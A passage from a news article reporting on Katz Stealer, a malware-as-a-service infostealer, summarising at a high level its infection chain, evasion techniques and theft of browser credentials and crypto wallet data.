Katz Stealer Malware Targets Major Web Browsers, Crypto Wallets

By Abdul Wasay ⏐ 2 months ago ⏐

2 min read

Katz Stealer Malware Targets Major Web Browsers Crypto Wallets

A newly identified malware-as-a-service (MaaS) threat, known as Katz Stealer, is actively targeting users of popular web browsers including Google Chrome, Microsoft Edge, Brave, and Mozilla Firefox. The aim: to steal sensitive data such as login credentials, cookies, session tokens, and cryptocurrency wallet information. The malware has been observed exploiting vulnerabilities in over 78 Chromium and Gecko-based browsers, making it a significant concern for both individual users and organizations.

Katz Stealer Infection Chain and Evasion Techniques

Katz Stealer uses a multi-stage infection method that starts with the delivery of extensively obfuscated JavaScript code hidden inside GZIP files. When executed, this code runs a base64-encoded PowerShell script that downloads a.NET-based loader payload. This loader injects the stealer into legal processes using techniques such as process hollowing, allowing it to run undetected.

To avoid discovery, Katz Stealer employs extensive evasion measures such as geofencing to prohibit execution in specific zones, virtual machine detection via BIOS queries and system uptime checks, and sandbox evasion by evaluating screen resolution. It also exploits trusted Windows tools such as cmstp.exe to circumvent User Account Control (UAC), granting elevated capabilities without warning users.

Data Exfiltration Capabilities

Once active, Katz Stealer establishes a persistent connection to its command and control (C2) server, downloading further payloads and injecting them into browser processes to harvest sensitive data. Notably, it can bypass Chrome’s app-bound encryption by extracting decryption keys from Local State files, saving them as plaintext for exfiltration.

Beyond browsers, the malware targets a wide range of applications and platforms, including: